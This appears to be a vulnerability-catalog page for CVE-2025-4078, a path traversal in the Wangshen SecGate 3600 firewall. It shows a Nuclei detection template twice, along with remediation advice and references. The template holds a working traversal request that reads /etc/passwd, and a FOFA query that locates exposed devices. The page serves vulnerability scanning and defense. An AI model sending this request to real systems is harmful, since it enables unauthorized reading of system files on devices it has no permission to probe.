Wangshen SecGate 3600 Path Traversal Vulnerability

CVE-2025-4078

Verified

Description

Wangshen SecGate 3600 2400 contains a path traversal caused by manipulation of the 'file_name' argument in '?g=log_export_file', letting remote attackers access arbitrary files, exploit requires remote access.

Severity

Medium

Published Date

February 11, 2026

Template Author

ark

CVE-2025-4078.yaml

id: CVE-2025-4078

info:
  name: Wangshen SecGate 3600 Path Traversal Vulnerability
  author: Ark
  severity: medium
  description: |
    Wangshen SecGate 3600 2400 contains a path traversal caused by manipulation of the 'file_name' argument in '?g=log_export_file', letting remote attackers access arbitrary files, exploit requires remote access.
  impact: |
    Remote attackers can access sensitive files on the system, potentially leading to information disclosure or system compromise.
  remediation: |
    Implement input validation and sanitize 'file_name' parameter; update to the latest firmware version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4078
    - https://vuldb.com/?id.295954
  metadata:
    verified: true
    max-request: 1
    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
  tags: cve,cve2025,wangshen,lfi,traversal,vuln,vkev

http:
  - raw:
      - |
        GET /?g=log_export_file&file_name=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
          - 'contains(content_type, "text/plain")'
        condition: and
# digest: 4a0a00473045022070b5b6da441274110c1174616e4ba757035a6e1696f87d767b092422cf4d5c31022100dcb56ce766c049a248f6a472412404fe0701a12353e8953459f0f3ba2a0e705d:922c64590222798bb761d5b6d8e72950

5.0Severity

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2025-4078 https://vuldb.com/?id.295954

Remediation Steps

Implement input validation and sanitize 'file_name' parameter; update to the latest firmware version if available.

id: CVE-2025-4078

info:
  name: Wangshen SecGate 3600 Path Traversal Vulnerability
  author: Ark
  severity: medium
  description: |
    Wangshen SecGate 3600 2400 contains a path traversal caused by manipulation of the 'file_name' argument in '?g=log_export_file', letting remote attackers access arbitrary files, exploit requires remote access.
  impact: |
    Remote attackers can access sensitive files on the system, potentially leading to information disclosure or system compromise.
  remediation: |
    Implement input validation and sanitize 'file_name' parameter; update to the latest firmware version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4078
    - https://vuldb.com/?id.295954
  metadata:
    verified: true
    max-request: 1
    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
  tags: cve,cve2025,wangshen,lfi,traversal,vuln,vkev

http:
  - raw:
      - |
        GET /?g=log_export_file&file_name=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
          - 'contains(content_type, "text/plain")'
        condition: and
# digest: 4a0a00473045022070b5b6da441274110c1174616e4ba757035a6e1696f87d767b092422cf4d5c31022100dcb56ce766c049a248f6a472412404fe0701a12353e8953459f0f3ba2a0e705d:922c64590222798bb761d5b6d8e72950

Wangshen SecGate 3600 Path Traversal Vulnerability

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Wangshen SecGate 3600 Path Traversal Vulnerability

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps